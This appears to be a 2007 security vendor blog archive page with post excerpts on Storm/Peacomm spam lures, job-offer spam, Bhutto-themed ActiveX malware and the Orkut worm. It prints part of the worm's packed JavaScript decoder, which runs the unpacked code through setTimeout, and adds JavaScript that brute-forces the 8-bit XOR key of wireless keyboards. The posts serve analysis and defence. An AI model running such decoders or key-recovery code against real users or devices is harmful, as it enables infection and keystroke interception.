Security Response
Showing posts for December of 2007
Peter Coogan | 31 Dec 2007 08:00:00 GMT | 0 comments

After a quiet “Storm” front over Thanksgiving, the Peacomm gang may be trying to make up for it now. The recent spam run, offering Mrs. Clause strip shows, demonstrates that they are back to using their adept social engineering techniques to dupe people into infecting their computers.

However, the Peacomm gang doesn’t seem content with its recent spam run and has launched a new one. Symantec is currently observing a spam run to celebrate New Years, 2008. Below is a list of some subject lines seen in the latest spam run:

• A New 2008 Year song
• A New Year song
• A brand New 2008 Year
• A brand New Year
• A fun packed New Year 2008 bash
• A new beginning, a new dawn!
• As the New 2008 Year...
• As the New Year...
• As you embrace another New Year 2008
• Blasting New 2008 Year...

Kelly Conley | 31 Dec 2007 08:00:00 GMT | 0 comments

Job offer spam has been around a while. It used to work like this: spammer joins job hunting site as a prospective employer, "researches" resumes of prospective employees, and then spams those individuals with job offers of home-based businesses. Or, sometimes no job hunting site was involved at all. It was just a spammer sending spam on a home-based business offer. Home-based business can be legitimate; however, if the offer comes to you via spam then it most likely is not.

The spammers used to use the job hunting sites themselves to send the offers. The recipient would receive the job offer through the sites where they had uploaded their resumes and it all looked legitimate until they read what the "job offer" actually was. What we are seeing now is spammers branching out. They appear to have collected the names of job hunters through these sites and are now sending the job offers directly to the prospective employees without going through the job hunting sites.

The emails...

Ashif Samnani | 28 Dec 2007 08:00:00 GMT | 0 comments

Wireless keyboards have been around for several years. After developing the first series of infrared devices, vendors have developed radio-based keyboards that run at 27 MHz.

Researchers Max Moser and Phillip Schroedel of Dreamlab Technologies recently released a report stating that various 27MHz keyboard devices are prone to an information disclosure vulnerability due to weak encryption (BID 26693). These devices include Microsoft’s Wireless Optical Desktop 1000 and 2000 models. The researchers also claimed that the 3000 and 4000 models as well as other 27MHz-based wireless laser desktop series may also be vulnerable, but this has not been confirmed.

The researchers managed to break the encryption on these devices. They claim that Microsoft uses an 8-bit XOR mechanism to encrypt wireless keystroke data. This means that there are only 2^8 or 256 possibilities for the encryption key, which can...
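To show why an 8-bit XOR key gives no real protection, here is an added example (not from the post or the Dreamlab report): it runs the exhaustive 256-key search over a constructed ciphertext and picks the key whose output looks most like typed text. The key, the phrase and the scoring heuristic are all assumptions made for the demo; nothing here models a real keyboard's radio protocol.

```javascript
'use strict';

// XOR with a repeated one-byte key: encryption and decryption are the same operation.
function xorBytes(bytes, key) {
  return Uint8Array.from(bytes, (b) => b ^ (key & 0xff));
}

// Heuristic: keystroke data is mostly letters and spaces. Count how many
// bytes of a candidate plaintext fall into that class.
function keystrokeLikeness(bytes) {
  let score = 0;
  for (const b of bytes) {
    const isLetter = (b >= 0x41 && b <= 0x5a) || (b >= 0x61 && b <= 0x7a);
    if (isLetter || b === 0x20) score++;
  }
  return score;
}

// Exhaustive search over the entire 2^8 = 256 key space: with so few keys
// there is nothing to "break", every candidate is simply tried.
function recoverKey(ciphertext) {
  let bestKey = 0;
  let bestScore = -1;
  for (let key = 0; key < 256; key++) {
    const score = keystrokeLikeness(xorBytes(ciphertext, key));
    if (score > bestScore) { bestScore = score; bestKey = key; }
  }
  return bestKey;
}

// Constructed demo data (not real radio captures): a typed phrase
// "protected" with the made-up one-byte key 0xA7.
const SAMPLE_KEY = 0xa7;
const SAMPLE_TEXT = 'the quick brown fox jumps over the lazy dog';
const SAMPLE_CIPHERTEXT = xorBytes(new TextEncoder().encode(SAMPLE_TEXT), SAMPLE_KEY);

// Recover key and plaintext from the ciphertext alone.
function demo(ciphertext = SAMPLE_CIPHERTEXT) {
  const key = recoverKey(ciphertext);
  const text = new TextDecoder().decode(xorBytes(ciphertext, key));
  return { key, text };
}
```

The pangram contains every letter, so only the true key maps all 43 bytes back into letters and spaces; any other key turns at least one of them into punctuation or a control byte.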

Vikram Thakur | 27 Dec 2007 08:00:00 GMT | 0 comments

It’s been less than 24 hours since the former Prime Minister of Pakistan was assassinated. As expected, the malware authors and distributors have already begun exploiting the morbid curiosity about Benazir Bhutto's death as a lure to spread their malice.

A simple search with terms such as "pakistan prime minister assassination" yields results that include pages like the one shown below:

bhutto_youtube.gif

As some would expect, clicking on some of these links will mean that the old (technique-wise) ActiveX message box will appear:

bhutto_activex.gif

The problem with many of these links is that the ActiveX Object is malicious. For example, following the link in the above image downloads a malicious file hosted on a server in Denmark...

Peter Ferrie | 27 Dec 2007 08:00:00 GMT | 0 comments

There should be no question anymore that the VX scene is dying.

On the 29A forum there was a post that roy g biv has officially left the 29A group. Given that Vallez has been silent for over a year, it seems clear that the 29A group is really dead now. We wish the boys luck in whatever legal pursuits they find now.

On the EOF and DoomRiderz fora, we can read that neither group has enough material for a new zine. On the rRlf site there's a message that the same thing has happened to them. EOF and DoomRiderz already announced their intention to produce a combined zine and now rRlf has announced that they will join in, too. Of course, if people are submitting the same thing to multiple groups in case one of them releases a zine, then even those three groups combined might not have enough material for a zine. In any case, it will probably not happen this year.

This brings us to another point - the supposed AV-VX "symbiotic relationship." It should be clear by now...

Jitender Sarda | 24 Dec 2007 08:00:00 GMT | 0 comments

Penny stock spammers have started using a high definition video file format to promote stock symbols. As we come up to the end of the year, spammers have moved quickly on using video formats for spamming with pump-and-dump stock symbols. Traditionally in penny stock spam, JPEG images were embedded in the email, followed by URLs that were redirected to other JPEG images. This year we have witnessed huge rounds of PDF and MP3 file formats to promote stock symbols.

Penny stock spammers have also used legitimate video commercials (TV and online media commercials) and clippings of professional financial news reports or programs. Often there are conversations between the host and the guest star "professional financial analyst," discussing the company’s strategies and financial prospects. The following are a couple of sample messages of the penny stock spam email:

Date: Fri, 07 Dec 2007 03:21:59 -0500
From: [REMOVED]
To: [REMOVED]
Subject: Catch The Wave Video...

Shunichi Imano | 23 Dec 2007 08:00:00 GMT | 0 comments

Look, here comes Santa...on his sleigh with Rudolph the red-nosed reindeer and a computer. This year, he seems to have decided to distribute free gifts through email...but with a catch.

An email that contains a link to a malicious file reportedly arrives as the following:
Subject: Seasons Greetings
Message Body:

listen up,

This Christmas, we want to show you something you will really enjoy.
This might not be fun for the whole family, but I bet you'll like it come one take 2 min and check it out.
hxxp://merrychrist[REMOVED]

If you click on the links, you will find pictures of women dressed as "Mrs. Clause" on the site and the malicious file stripshow.exe, which is a new variant of Trojan.Peacomm.D, will be downloaded if you click on the picture.

...

Andrea Lelli | 21 Dec 2007 08:00:00 GMT | 0 comments

New fake codec Web sites often appear out of nowhere (we are pretty used to seeing them) and in most cases if you download and run the "codec" you get infected with a variant of Trojan.Zlob. Nothing new, but this time I found something different. I was testing a fake codec Web site when I came upon a new variant. The installation step is the usual:


Figure 1: Standard installation process

However, after that the browser is started with a Google search for the word “sex.” The interesting part is that while browsing, you will now be frequently faced with this popup:

...

Umesh Wanve | 20 Dec 2007 08:00:00 GMT | 0 comments

Orkut is a popular social networking site with millions of registered users. A couple of days ago Orkut was hit with a worm that impacted close to 700,000 users in approximately 24 hours. We took a closer look at the exploit to get an idea of why so many users' systems were infected. The exploit was contained in a JavaScript file, aptly named "virus.js", which was injected using an embed tag. Here is a snippet of the JavaScript file:

function $(p,a,c,k,e,d) {
 // e(): encode a dictionary index as a base-a token; indexes above 35
 // become uppercase letters (36 -> 'A'), the rest base-36 digits.
 e=function(c) {
  return(c>35?String.fromCharCode(c+29):c.toString(36))
 };
 // Engines that support function replacements take this branch: build the
 // token -> word dictionary (an empty word list entry means the token
 // stands for itself) and set up a single pass over every \w+ token.
 if(!''.replace(/^/,String)){
  while(c--){d[e(c)]=k[c]||e(c)}
  k=[function(e){return d[e]}];
  e=function(){return'\\w+'};
  c=1
 };
 // Replace every whole-word token in p with its dictionary entry.
 while(c--){
  if(k[c]){
   p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
  }
 }
 return p
};
// The unpacked source is handed straight to setTimeout, which runs it.
setTimeout(
$('5...
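For analysts who want to read such a payload without ever executing it, here is an added example (not the worm's code and not part of the post) that re-implements the same p,a,c,k,e,d decoder as a plain function returning the unpacked source instead of passing it to setTimeout. The packed sample, its radix and its word list are constructed for the demo, not taken from virus.js.

```javascript
'use strict';

// The packer's e(): write index c in base a, where digits above 35 become
// uppercase letters (36 -> 'A', 37 -> 'B', ...).
function encodeIndex(c, a) {
  const high = c < a ? '' : encodeIndex(Math.floor(c / a), a);
  const digit = c % a;
  const low = digit > 35 ? String.fromCharCode(digit + 29) : digit.toString(36);
  return high + low;
}

// p: packed source, a: radix, c: number of dictionary slots, k: word list.
// An empty word list entry means "the token stands for itself".
function unpack(p, a, c, k) {
  const dict = Object.create(null);
  for (let i = 0; i < c; i++) {
    const token = encodeIndex(i, a);
    dict[token] = k[i] || token;
  }
  // Same single pass the decoder stub performs: every \w+ token is swapped
  // for its dictionary entry; tokens outside the dictionary are left alone.
  return p.replace(/\b\w+\b/g, (tok) => (tok in dict ? dict[tok] : tok));
}

// Constructed sample (not the real virus.js payload): the packer's '|'-joined
// word list, with slots 36 and 37 exercising the uppercase token mapping.
const SAMPLE_A = 62;
const SAMPLE_C = 38;
const SAMPLE_K = ('hello|alert' + '|'.repeat(34) + '|var|greeting').split('|');
const SAMPLE_P = "A B='0';1(B);";

// Returns the readable source, which is what the worm would have executed.
function demo() {
  return unpack(SAMPLE_P, SAMPLE_A, SAMPLE_C, SAMPLE_K);
}
```

The same function applied to the real sample would take the four arguments of the `$(...)` call in virus.js, with the word list split on `|` exactly as the packer does.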